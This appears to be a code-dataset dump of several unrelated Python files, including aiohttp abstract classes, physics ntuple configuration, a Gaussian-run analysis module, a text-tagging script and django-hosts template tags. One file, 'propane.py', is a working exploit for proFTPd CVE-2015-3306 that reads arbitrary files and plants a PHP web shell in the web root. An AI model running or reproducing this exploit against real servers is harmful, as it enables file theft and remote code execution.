def resolve(self, hostname):
"""Return IP address for given hostname"""
@asyncio.coroutine # pragma: no branch
@abstractmethod
def close(self):
"""Release resolver"""
class AbstractCookieJar(Sized, Iterable):
def __init__(self, *, loop=None):
self._loop = loop or asyncio.get_event_loop()
@abstractmethod
def clear(self):
"""Clear all cookies."""
@abstractmethod
def update_cookies(self, cookies, response_url=None):
"""Update cookies."""
@abstractmethod
def filter_cookies(self, request_url):
"""Return the jar's cookies filtered by their attributes."""
class AbstractPayloadWriter(ABC):
@abstractmethod
def write(self, chunk):
"""Write chunk into stream"""
@asyncio.coroutine
@abstractmethod
def write_eof(self, chunk=b''):
"""Write last chunk"""
@asyncio.coroutine
@abstractmethod
def drain(self):
"""Flush the write buffer."""
|
VRaviTheja/SDN-policy
|
testing/testing_portrange.py
|
Python
|
apache-2.0
| 112
| 0
|
from port_range import PortRange
pr = PortRange('1027/15')
print(pr.bounds)
pr = PortRange('4242-42')
print(pr)
|
nootropics/propane
|
propane.py
|
Python
|
mit
| 3,698
| 0.027853
|
#!/usr/bin/env python
import sys
import os
import optparse
import socket
import random
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
if sys.platform == 'win32':
HEADER = ''
OKBLUE = ''
OKGREEN = ''
WARNING = ''
FAIL = ''
ENDC = ''
BOLD = ''
UNDERLINE = ''
def caution( msg ): print bcolors.BOLD + bcolors.WARNING + "[" + bcolors.ENDC + "!" + bcolors.WARNING + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC
def good( msg ): print bcolors.BOLD + bcolors.OKGREEN + "[" + bcolors.ENDC + "+" + bcolors.OKGREEN + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC
def status( msg ): print bcolors.BOLD + bcolors.OKBLUE + "[" + bcolors.ENDC + "*" + bcolors.OKBLUE + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC
def error( msg ): print bcolors.BOLD + bcolors.FAIL + "[" + bcolors.ENDC + "-" + bcolors.FAIL + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC
def banner():
title = "proFTPd Arbitrary File Read Write w/ Possible Code Execution (CVE-2015-3306)"
author = "Author: nootropics (root@ropcha.in)"
ch=' '
length=80
spaced_title = ' %s ' % title
spaced_author = ' %s ' % author
print "\n" + bcolors.WARNING + spaced_title.center(length, ch)
print spaced_author.center(length, ch) + "\n\n" + bcolors.ENDC
def clear():
if os.name == 'nt' or sys.platform.startswith('win'): os.system('cls')
else: os.system('clear')
def main():
parser = optparse.OptionParser(banner(), version="%prog")
parser.add_option("-t", "--target", dest="target", default="localhost", type="string", help="Target IP")
parser.add_option("-p", "--port", dest="port", default=21, type="int", help="Target Port")
parser.add_option("-f", "--file", dest="file", default="/etc/passwd", type="string", help="File to grab")
parser.add_option("-m", "--mode", dest="chosenmode", default="1", type="string", help="Option to use 1: Test, 2: Grab File, 3: Code Exec")
parser.add_option("-w", "--webdir", dest="webdir", default="/var/www/", type="string", help="Directory where the webserver gets files from (/var/www/)")
(options, args) = parser.parse_args()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(( options.target, options.port ))
except Exception:
quit(error("Cannot connect to %s:%s" % (options.target, options.port)))
status("Connected to %s:%s" % (options.target, options.port))
if options.chosenmode == "1":
s.send("site cpfr /etc/passwd\n")
if "350" in s.recv(1024):
good("Target is vulnerable!")
else:
error("Target doesn't appear to be vulnerable!")
if options.chosenmode == "2":
resultpath = options.webdir + ''.join(random.choice('0123456789ABCDEF') for i in range(16))
s.send("site cpfr %s" % options.file)
if "350" in s.recv(1024):
good("File exists! Copying now")
else:
error("File cannot be
|
found or accessed")
s.send("site cpto %s" % resultpath)
if "250" in s.recv(1024):
good("Copy sucessful! Check http://%s/%s for your file!" % (options.target, resultpath))
else:
error("Access denied!")
    if options.chosenmode == "3":
        shellkey = ''.join(random.choice('0123456789ABCDEF') for i in range(16)) + ".php"
        s.send("site cpfr /etc/passwd\n")
        s.recv(1024)
        s.send("site cpto <?php @$_GET['x']($_GET['a']); ?>\n")
        s.recv(1024)
        s.send("site cpfr /proc/self/fd/3\n")
        s.recv(1024)
        s.send("site cpto %s%s\n" % (options.webdir, shellkey))
        s.recv(1024)
        status("Browse to http://%s/%s to activate your payload!" % (options.target, shellkey))
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
sys.exit(error("Closing!"))
|
stuart-knock/tvb-framework
|
tvb/core/code_versions/code_update_scripts/4750_update_code.py
|
Python
|
gpl-2.0
| 2,378
| 0.006728
|
# -*- coding: utf-8 -*-
#
#
# TheVirtualBrain-Framework Package. This package holds all Data Management, and
# Web-UI helpful to run brain-simulations. To use it, you also need do download
# TheVirtualBrain-Scientific Package (for simulators). See content of the
# documentation-folder for more details. See also http://www.thevirtualbrain.org
#
# (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest")
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the Free
# Software Foundation. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details. You should have received a copy of the GNU General
# Public License along with this program; if not, you can download it here
# http://www.gnu.org/licenses/old-licenses/gpl-2.0
#
#
# CITATION:
# When using The Virtual Brain for scientific publications, please cite it as follows:
#
# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,
# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)
#   The Virtual Brain: a simulator of primate brain network dynamics.
# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)
#
#
"""
.. moduleauthor:: Bogdan Neacsa <bogdan.neacsa@codemart.ro>
"""
from tvb.basic.logger.builder import get_logger
from tvb.core.entities.storage import dao
from tvb.core.services.event_handlers import handle_event
LOGGER = get_logger(__name__)
PAGE_SIZE = 20
EVENT_FILE_IDENTIFIER = "CodeVersionsManager.update.4750"
def update():
"""
Update TVB code to SVN revision version 4770.
This update was done for release 1.0.5
"""
projects_count = dao.get_all_projects(is_count=True)
for page_start in range(0, projects_count, PAGE_SIZE):
projects_page = dao.get_all_projects(page_start=page_start,
page_end=min(page_start + PAGE_SIZE, projects_count))
for project in projects_page:
try:
handle_event(EVENT_FILE_IDENTIFIER, dao.get_system_user(), project)
except Exception, excep:
LOGGER.exception(excep)
|
Williams224/davinci-scripts
|
ksteta3pi/NTupleMaker_MagDown.py
|
Python
|
mit
| 17,928
| 0.01863
|
from Gaudi.Configuration import *
from Configurables import DaVinci
#from Configurables import AlgTool
from Configurables import GaudiSequencer
MySequencer = GaudiSequencer('Sequence')
#For 2012 MC
DaVinci.DDDBtag='dddb-20130929-1'
DaVinci.CondDBtag='sim-20130522-1-vc-md100'
#for 2011 MC
#DaVinci.DDDBtag='dddb-20130929'
#DaVinci.CondDBtag='sim-20130522-vc-mu100'
simulation=True
#################################################################
#Rerun with stripping21 applied
if simulation:
from Configurables import EventNodeKiller
from StrippingConf.Configuration import StrippingConf, StrippingStream
from StrippingSettings.Utils import strippingConfiguration
from StrippingArchive.Utils import buildStreams
from StrippingArchive import strippingArchive
event_node_killer=EventNodeKiller('StripKiller')
event_node_killer.Nodes=['Event/AllStreams','/Event/Strip']
from Configurables import PhysConf
PhysConf().CaloReProcessing=True
stripping="stripping21"
config=strippingConfiguration(stripping)
archive=strippingArchive(stripping)
streams=buildStreams(stripping=config,archive=archive)
MyStream= StrippingStream("MyStream")
    MyLines= ["StrippingB2XEtaB2eta3piKstarLine"]
for stream in streams:
for line in stream.lines:
if line.name() in MyLines:
MyStream.appendLines( [ line ])
from Configurables import ProcStatusCheck
filterBadEvents=ProcStatusCheck()
sc=StrippingConf( Streams= [ MyStream ],
MaxCandidates = 2000,
                      AcceptBadEvents = False,
BadEventSelection = filterBadEvents)
DaVinci().appendToMainSequence([event_node_killer,sc.sequence()])
##################Creating NTuples#####################################
from Configurables import DecayTreeTuple
from Configurables import TupleToolL0Calo
from DecayTreeTuple.Configuration import *
line = 'B2XEtaB2eta3piKstarLine'
tuple=DecayTreeTuple()
tuple.Decay="[B0 -> ^(K*(892)0 -> ^K+ ^pi-) ^(eta -> ^pi- ^pi+ ^(pi0 -> ^gamma ^gamma))]CC"
tuple.Branches={"B0":"[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC"}
tuple.Inputs=['/Event/Phys/{0}/Particles'.format(line)]
tuple.addTool(TupleToolL0Calo())
tuple.TupleToolL0Calo.TriggerClusterLocation="/Event/Trig/L0/Calo"
tuple.TupleToolL0Calo.WhichCalo="HCAL"
tuple.ToolList += [
"TupleToolGeometry"
, "TupleToolDira"
, "TupleToolAngles"
# , "TupleToolL0Calo"
, "TupleToolPid"
, "TupleToolKinematic"
, "TupleToolPropertime"
, "TupleToolPrimaries"
, "TupleToolEventInfo"
, "TupleToolTrackInfo"
, "TupleToolVtxIsoln"
, "TupleToolPhotonInfo"
, "TupleToolMCBackgroundInfo"
, "TupleToolCaloHypo"
, "TupleToolTrackIsolation"
, "TupleToolPi0Info"
]
tuple.addTool(TupleToolDecay,name="B0")
from Configurables import TupleToolDecayTreeFitter
#========================================REFIT WITH DAUGHTERS AND PV CONSTRAINED==============================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/ConsAll')
tuple.B0.ConsAll.Verbose=True
tuple.B0.ConsAll.constrainToOriginVertex=True
tuple.B0.ConsAll.daughtersToConstrain = ["K*(892)0","eta"]
#==============================REFIT WITH ETA, PI0 AND PV CONTRAINED==============================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpf')
tuple.B0.PVFitpf.Verbose=True
tuple.B0.PVFitpf.constrainToOriginVertex=True
tuple.B0.PVFitpf.daughtersToConstrain = ["eta","pi0"]
#==============================REFIT WITH ONLY ETA AND PV CONSTRAINED==========================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFit')
tuple.B0.PVFit.Verbose=True
tuple.B0.PVFit.constrainToOriginVertex=True
tuple.B0.PVFit.daughtersToConstrain = ["eta"]
#==============================REFIT WITH ETA AND PV K for piCONTRAINED==============================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitKforpi')
tuple.B0.PVFitKforpi.Verbose=True
tuple.B0.PVFitKforpi.constrainToOriginVertex=True
tuple.B0.PVFitKforpi.daughtersToConstrain = ["eta"]
tuple.B0.PVFitKforpi.Substitutions={
"B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "pi+" ,
"B~0 -> (K*(892)~0 -> ^K- pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "pi-" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piminus ->K swap ==============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminusforK')
tuple.B0.PVFitpiminusforK.Verbose=True
tuple.B0.PVFitpiminusforK.constrainToOriginVertex=True
tuple.B0.PVFitpiminusforK.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiminusforK.Substitutions={
"B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "K-" ,
"B~0 -> (K*(892)~0 -> K- ^pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "K+" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piminus0 -> Kminus swap =============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminus0forK')
tuple.B0.PVFitpiminus0forK.Verbose=True
tuple.B0.PVFitpiminus0forK.constrainToOriginVertex=True
tuple.B0.PVFitpiminus0forK.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiminus0forK.Substitutions={
"B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))" : "K-" ,
"B~0 -> (K*(892)~0 -> K- pi+) (eta -> ^pi+ pi- (pi0 -> gamma gamma))" : "K+" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiplusforK')
tuple.B0.PVFitpiplusforK.Verbose=True
tuple.B0.PVFitpiplusforK.constrainToOriginVertex=True
tuple.B0.PVFitpiplusforK.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiplusforK.Substitutions={
"B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))" : "K+" ,
"B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ ^pi- (pi0 -> gamma gamma))" : "K-" ,
}
#proton swaps
#==============================REFIT WITH ETA AND PV K for proton CONTRAINED==============================
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitKforproton')
tuple.B0.PVFitKforproton.Verbose=True
tuple.B0.PVFitKforproton.constrainToOriginVertex=True
tuple.B0.PVFitKforproton.daughtersToConstrain = ["eta"]
tuple.B0.PVFitKforproton.Substitutions={
"B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "p+" ,
"B~0 -> (K*(892)~0 -> ^K- pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "p~-" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piminus ->K swap ==============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminusforproton')
tuple.B0.PVFitpiminusforproton.Verbose=True
tuple.B0.PVFitpiminusforproton.constrainToOriginVertex=True
tuple.B0.PVFitpiminusforproton.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiminusforproton.Substitutions={
"B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "p~-" ,
"B~0 -> (K*(892)~0 -> K- ^pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "p+" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piminus0 -> Kminus swap =============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminus0forproton')
tuple.B0.PVFitpiminus0forproton.Verbose=True
tuple.B0.PVFitpiminus0forproton.constrainToOriginVertex=True
tuple.B0.PVFitpiminus0forproton.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiminus0forproton.Substitutions={
"B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))" : "p~-" ,
"B~0 -> (K*(892)~0 -> K- pi+) (eta -> ^pi+ pi- (pi0 -> gamma gamma))" : "p+" ,
}
#==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============
tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiplusforproton')
tuple.B0.PVFitpiplusforproton.Verbose=True
tuple.B0.PVFitpiplusforproton.constrainToOriginVertex=True
tuple.B0.PVFitpiplusforproton.daughtersToConstrain = ["eta"]
tuple.B0.PVFitpiplusforproton.Substitutions={
"B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))" : "p+" ,
"B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ ^pi- (pi0 -> gamma gamma))" : "p~-" ,
}
#==============================REFI
|
chrisjsewell/PyGauss
|
pygauss/analysis.py
|
Python
|
gpl-3.0
| 44,913
| 0.00993
|
# -*- coding: utf-8 -*-
from itertools import product, imap
import copy
import math
import string
import multiprocessing
import platform
import numpy as np
import pandas as pd
from pandas.tools.plotting import radviz
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib.colors import ColorConverter
from sklearn.cluster import KMeans
from IPython.core.display import clear_output
from .molecule import Molecule
from .utils import df_to_img
from .file_io import Folder
def unpack_and_make_molecule(val_dict):
if val_dict.has_key('args'):
args = val_dict.pop('args')
else:
args = []
return Molecule(*args, **val_dict)
class Analysis(object):
"""a class to analyse multiple computations """
def __init__(self, folderpath='', server=None, username=None, passwrd=None,
folder_obj=None, headers=[]):
"""a class to analyse multiple computations
Parameters
----------
folderpath : str
the folder directory storing the files to be analysed
server : str
the name of the server storing the files to be analysed
username : str
the username to connect to the server
passwrd : str
server password, if not present it will be asked for during initialisation
headers : list
the variable categories for each computation
"""
self._folder = None
if folder_obj:
self._folder = folder_obj
elif folderpath or server:
self.set_folder(folderpath, server, username, passwrd)
heads = headers[:]+['Molecule']
self._df = pd.DataFrame(columns=heads)
self._df.index.name = 'ID'
self._next_index = 0
def __repr__(self):
return self.get_table().to_string()
def copy(self):
clone = copy.deepcopy(self)
return clone
def get_folder(self):
return self._folder
def set_folder(self, folderpath='', server=None,
username=None, passwrd=None):
self._folder = Folder(folderpath, server, username, passwrd)
folder = property(get_folder, set_folder,
doc="The folder for gaussian runs")
def count_runs(self):
""" get number of runs held in analysis """
return len(self._df.index)
def _add_molecule(self, molecule, identifiers):
"""add molecule to internal dataframe """
identifiers['Molecule'] = molecule
series = pd.DataFrame(identifiers,
index=[self._next_index])
self._df = self._df.copy().append(series)
self._next_index += 1
return True
def add_run(self, identifiers={},
init_fname=None, opt_fname=None,
freq_fname=None, nbo_fname=None,
alignto=[], atom_groups={},
add_if_error=False, folder_obj=None):
"""add single Gaussian run input/outputs """
if not folder_obj:
folder_obj = self._folder
molecule = Molecule(init_fname=init_fname,
opt_fname=opt_fname,
freq_fname=freq_fname,
nbo_fname=nbo_fname,
folder_obj=folder_obj,
alignto=alignto, atom_groups=atom_groups,
fail_silently=True)
num_files = filter(lambda x:x, [init_fname, opt_fname,
freq_fname, nbo_fname])
read_errors = molecule.get_init_read_errors()
        if len(read_errors) != len(num_files) and (not read_errors or add_if_error):
self._add_molecule(molecule, identifiers)
return molecule.get_init_read_errors()
def _get_molecules(self, mol_inputs, folder_obj, identifiers, ipython_print=False):
""" get molecules """
if folder_obj.islocal() and not platform.system() == 'Windows':
pool = multiprocessing.Pool(processes=multiprocessing.cpu_count())
mapping = pool.imap
else:
mapping = imap
with folder_obj:
molecules=[]
all_read_errors = []
for molecule in mapping(unpack_and_make_molecule, mol_inputs):
molecules.append(molecule)
read_errors = []
for typ, fname, msg in molecule.get_init_read_errors():
idents = identifiers[len(molecules)-1].copy()
idents.pop('Molecule', '_')
idents['Type'] = typ
idents['File'] = fname
idents['Error_Message'] = msg
read_errors.append(idents)
all_read_errors.append(read_errors)
if ipython_print:
print 'Reading data {0} of {1}'.format(len(molecules),
len(mol_inputs))
try:
clear_output(wait=True)
except:
pass
if folder_obj.islocal() and not platform.system() == 'Windows':
pool.close()
pool.join()
return molecules, all_read_errors
def add_runs(self, headers=[], values=[],
init_pattern=None, opt_pattern=None,
freq_pattern=None, nbo_pattern=None,
add_if_error=False,
alignto=[], atom_groups={},
ipython_print=False, folder_obj=None):
"""add multiple Gaussian run inputs/outputs """
# set folder oject
if not folder_obj:
folder_obj = self._folder
#get variables for each run
mol_inputs = []
identifiers = []
for idents in product(*values):
mol_input = {}
identifiers.append(dict(zip(headers, idents)))
mol_input['init_fname'] = init_pattern.format(*idents) if init_pattern else None
if type(opt_pattern) is str:
mol_input['opt_fname'] = opt_pattern.format(*idents) if opt_pattern else None
elif type(opt_pattern) is list or type(opt_pattern) is tuple:
mol_input['opt_fname'] = [o.format(*idents) for o in opt_pattern]
else:
mol_input['opt_fname'] = None
mol_input['freq_fname'] = freq_pattern.format(*idents) if freq_pattern else None
mol_input['nbo_fname'] = nbo_pattern.format(*idents) if nbo_pattern else None
mol_input['folder_obj'] = folder_obj
mol_input['alignto'] = alignto
mol_input['atom_groups'] = atom_groups
mol_input['fail_silently'] = True
mol_inputs.append(mol_input)
#create the molecules
        molecules, read_errors = self._get_molecules(mol_inputs, folder_obj,
                                                     identifiers, ipython_print)
#add the molecules to the internal table
for molecule, idents, inputs, read_error in zip(molecules, identifiers,
mol_inputs, read_errors):
num_files = filter(lambda x:x, [inputs['init_fname'], inputs['opt_fname'],
inputs['freq_fname'], inputs['nbo_fname']])
            if len(read_error) != len(num_files) and (not read_error or add_if_error):
self._add_molecule(molecule, idents)
#collate read errors into a dataframe to return
read_errors = filter(len, read_errors)
err_df = pd.DataFrame([item for sublist in read_errors for item in sublist])
if read_errors:
|
sadahanu/DataScience_SideProject
|
Stack_Exchange/py2_text.py
|
Python
|
mit
| 7,689
| 0.017167
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 13 23:10:40 2016
@author: zhouyu
"""
#%%
import pandas as pd
import numpy as np
import os
import re
import nltk
from nltk.corpus import stopwords
from bs4 import BeautifulSoup
os.chdir('/Users/zhouyu/Documents/Zhou_Yu/DS/kaggle_challenge/text processing')
#%% step1: import data
import glob
alltrainfiles = glob.glob("*.csv")
raw_text =pd.concat((pd.read_csv(f,index_col = None, header =0) for f in alltrainfiles),ignore_index = True)
#raw_text = pd.read_csv("crypto.csv",index_col = None)
#%% step2: clean data, remove HTML, symbols and stopwords
def text_to_words(rawtext):
#split into individual words, remove HTML, only keep letters and number
# convert letters to lower case
reg_c = re.compile('[^a-zA-Z0-9_\\+\\-]')
words = [word for word in reg_c.split(rawtext.lower()) if word!='']
stops = set(stopwords.words("english"))
#take out stop words
meaningful_words = [w for w in words if not w in stops]
return(" ".join(meaningful_words))
def target_to_words(rawtext):
#only return the first target word
reg_c = re.compile('[^a-zA-Z0-9_\\+\\-]')
words = [word for word in reg_c.split(rawtext.lower()) if word!='']
stops = set(stopwords.words("english"))
#take out stop words
meaningful_words = [w for w in words if not w in stops]
return(meaningful_words[0])
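#%% quick sanity check of the cleaners (assumes the NLTK stopword corpus is
# installed, e.g. via nltk.download('stopwords')):
# text_to_words("How do I hash a password in Python?") -> 'hash password python'
# target_to_words("python hashlib") -> 'python'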
#%%
cleaned_post = []
cleaned_target = []
sz = raw_text.shape[0]
for i in range(0,sz):
raw_post = raw_text['title'][i]+' '+raw_text['content'][i]
raw_post = BeautifulSoup(raw_post).get_text()
cleaned_post.append(text_to_words(raw_post))
cleaned_target.append(target_to_words(raw_text['tags'][i]))
if((i+1)%1000==0):
print "Cleanning %d of %d\n" % (i+1,sz)
#print cleaned_post[1]
#%% step3: creating features from a bag of words
from sklearn.feature_extraction.text import CountVectorizer
count_vect = CountVectorizer(analyzer = "word", \
tokenizer = None, \
preprocessor = None, \
stop_words = None, \
max_features = 5000)
X_train_counts = count_vect.fit_transform(cleaned_post)
#X_target_counts = count_vect.fit_transform(cleaned_target)
from sklearn.feature_extraction.text import TfidfTransformer
tf_transformer = TfidfTransformer(use_idf = False).fit(X_train_counts)
X_train_tf = tf_transformer.transform(X_train_counts)
#%% training a linear model
# METHOD 1: BUILD randomforestclassifier...
from sklearn.ensemble import RandomForestClassifier
rf = RandomForestClassifier(n_estimators = 10)
forest = rf.fit(X_train_tf, cleaned_target)
#%% examine the result produced by METHOD 1:
pred = rf.predict(X_train_tf)
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from collections import OrderedDict
import matplotlib.pyplot as plt
import itertools
def plot_confusion_matrix(cm, classes,
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
print("Normalized confusion matrix")
else:
print('Confusion matrix, without normalization')
print(cm)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, cm[i, j],
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
cnf_matrix = confusion_matrix(cleaned_target,pred)
#target_names = set(cleaned_target)
#np.set_printoptions(precision = 2)
#plt.figure()
#plot_confusion_matrix(cnf_matrix,classes = target_names,normalize = True,title='Normalized confusion matrix')
#plt.show()
target_names = list(OrderedDict.fromkeys(cleaned_target))
print(classification_report(cleaned_target,pred,target_names = target_names))
#######
#%% Method 2: directly predicted as the highest frequency element
# find the highest tf-idf
#step1: select a random sample
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from collections import OrderedDict
sample = np.random.choice(87000,1000,replace = False)
tf_pred = []
tf_target = []
for i in range(0,1000):
r = sample[i];
tf_target.append(cleaned_target[r])
tf_post = X_train_tf.getrow(r).toarray()
tf_post_max = tf_post.argmax()
tf_pred.append(count_vect.get_feature_names()[tf_post_max])
tf_cnf_matrix = confusion_matrix(tf_target,tf_pred)
target_names = list(OrderedDict.fromkeys(tf_pred+tf_target))
print(classification_report(tf_target, tf_pred,target_names =target_names))
#%% evaluate test set
test = pd.read_csv('test/test.csv')
cleaned_test = []
test_sz = test.shape[0]
for i in range(0,test_sz):
test_post = test['title'][i]+' '+test['content'][i]
test_post = BeautifulSoup(test_post).get_text()
cleaned_test.append(text_to_words(test_post))
if((i+1)%1000==0):
print "Cleanning %d of %d\n" % (i+1,test_sz)
#%% use random forest
X_test_counts = count_vect.fit_transform(cleaned_test)
X_test_tf = tf_transformer.transform(X_test_counts)
result = forest.predict(X_test_counts)
# use max tf-idf
#%%
test_pred = []
for i in range(0,test_sz):
tf_test = X_test_tf.getrow(i).toarray()
# just return one tag
#tf_test_max = tf_test.argmax()
#test_pred.append(count_vect.get_feature_names()[tf_test_max])
ind = np.argpartition(tf_test,-4)[:,-4:]
pred_tags = [count_vect.get_feature_names()[j] for j in ind[0,:].tolist()]
test_pred.append( " ".join(pred_tags))
if((i+1)%1000==0):
print "Predicting %d of %d\n" % (i+1,test_sz)
result = test_pred
#%% prepare submission
submission = pd.read_csv('test/sample_submission.csv')
submission.iloc[:,1] = result
submission.to_csv('test/submission.csv',index = None)
#%% try an NMF topic model (note: its topics can not be mapped back to a specific question...)
n_features = 5000
n_topics = 10
n_samples = test_sz
n_top_words = 4
def get_top_words(model, feature_names, n_top_words):
res = []
for topic_idx, topic in enumerate(model.components_):
tags = " ".join([feature_names[i]
for i in topic.argsort()[:-n_top_words - 1:-1]])
res.append(tags)
return res
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.decomposition import NMF
from time import time
tfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2,
max_features=n_features,
stop_words='english')
tfidf = tfidf_vectorizer.fit_transform(cleaned_test)
# Fit the NMF model
print("Fitting the NMF model (Frobenius norm) with tf-idf features, "
"n_samples=%d and n_features=%d..."
% (n_samples, n_features))
t0 = time()
nmf = NMF(n_components=n_topics, random_state=1,
alpha=.1, l1_ratio=.5).fit(tfidf)
print("done in %0.3fs." % (time() - t0))
print("\nTopics in NMF model (Frobenius norm):")
tfidf_feature_names = tfidf_vectorizer.get_feature_names()
#print_top_words(nmf, tfidf_feature_names, n_top_words)
result = get_top_words(nmf,tfidf_feature_names,n_top_words)
|
detman/stomplooper
|
recorder.py
|
Python
|
gpl-3.0
| 646
| 0.010836
|
#!/usr/bin/python
import time
class Recorder(object):
debug = 0
def __init__(self):
self.recordings = []
self.lastRecord = 0
if Recorder.debug:
print("init Recorder")
def record(self):
now = time.time();
if self.lastRecord != 0:
            self.recordings.append(now-self.lastRecord)
if Recorder.debug:
print(len(self.recordings), " ", self.recordings[-1]);
self.lastRecord = now
    def empty(self):
        return len(self.recordings) == 0
    def minInterval(self):
        return 0 if len(self.recordings) == 0 else min(self.recordings)
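# Minimal usage sketch (illustrative; in the looper the record() calls would
# come from real events such as taps):
if __name__ == "__main__":
    r = Recorder()
    for _ in range(4):
        r.record()
        time.sleep(0.25)
    print(r.recordings)     # three intervals of roughly 0.25s each
    print(r.minInterval())  # shortest interval recorded so far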
|
jezdez/django-hosts
|
django_hosts/templatetags/hosts.py
|
Python
|
bsd-3-clause
| 5,070
| 0
|
import re
from django import template
from django.conf import settings
from django.template import TemplateSyntaxError
from django.template.base import FilterExpression
from django.template.defaulttags import URLNode
from django.utils.encoding import iri_to_uri, smart_str
from django.urls import set_urlconf, get_urlconf
from ..resolvers import reverse_host, get_host
from ..utils import normalize_scheme, normalize_port
register = template.Library()
kwarg_re = re.compile(r"(?:(\w+)=)?(.+)")
class HostURLNode(URLNode):
def __init__(self, *args, **kwargs):
self.host = kwargs.pop('host')
self.host_args = kwargs.pop('host_args')
self.host_kwargs = kwargs.pop('host_kwargs')
self.scheme = kwargs.pop('scheme')
self.port = kwargs.pop('port')
super(HostURLNode, self).__init__(*args, **kwargs)
def maybe_resolve(self, var, context):
"""
Variable may have already been resolved
in e.g. a LoopNode, so we only resolve()
if needed.
"""
if isinstance(var, FilterExpression):
return var.resolve(context)
return var
def render(self, context):
host = get_host(self.maybe_resolve(self.host, context))
current_urlconf = get_urlconf()
try:
set_urlconf(host.urlconf)
path = super(HostURLNode, self).render(context)
if self.asvar:
path = context[self.asvar]
finally:
set_urlconf(current_urlconf)
host_args = [self.maybe_resolve(x, context) for x in self.host_args]
host_kwargs = dict((smart_str(k, 'ascii'),
self.maybe_resolve(v, context))
for k, v in self.host_kwargs.items())
if self.scheme:
scheme = normalize_scheme(self.maybe_resolve(self.scheme, context))
else:
scheme = host.scheme
if self.port:
port = normalize_port(self.maybe_resolve(self.port, context))
else:
port = host.port
hostname = reverse_host(host, args=host_args, kwargs=host_kwargs)
uri = iri_to_uri('%s%s%s%s' % (scheme, hostname, port, path))
if self.asvar:
context[self.asvar] = uri
return ''
else:
return uri
def parse_params(name, parser, bits):
args = []
kwargs = {}
for bit in bits:
match = kwarg_re.match(bit)
if not match:
